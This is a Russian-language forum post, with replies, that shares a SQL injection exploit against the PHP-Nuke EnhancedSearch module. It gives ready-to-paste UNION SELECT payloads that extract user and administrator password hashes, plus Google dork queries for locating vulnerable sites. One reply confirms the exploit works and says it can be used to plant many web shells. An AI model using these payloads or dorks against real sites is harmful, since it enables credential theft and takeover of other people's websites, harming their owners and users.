phpnuke SQL Inj ALL VERSIONS
 

Бага найдена в модуле поиска (EnhancedSearch).

Ввести в поиске :
EnhancedSearch%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/*

EnhancedSearch%') UNION SELECT 0,pwd,name,aid,0,0,0,0,0,0 FROM nuke_authors/*

EnhancedSearch%') UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/*

И получим хеш админа.
А что с ним делать, это уже ваше дело :))))


Небольшие запросы для гугла :))
"Enhanced Search Version 2.0: Powered by"

inurl:"modules.php?name=EnhancedSearch"


Источник : security.nnov.ru

Все верно, все работает. Дает хэши админа и других юзеров.
На этом можно туеву хучу шеллов поднять.

LoFFi, наверно хорошо, что скинул. Может кому пригодится. Но нюку лучше на месте смотреть. Скрипткиддинг такой только на самых запущенных движках проходит.
Кстати, эта бага кажись в середине апреля была в nnov опубликована. Известна стала широкому кругу (ну тем, кто нюкой занимается) пораньше. Много с неё сложно поймать.
http://www.lock-team.ru/news/world_news/38.html (это далеко не первоисточник, просто первое что по запросу вышло)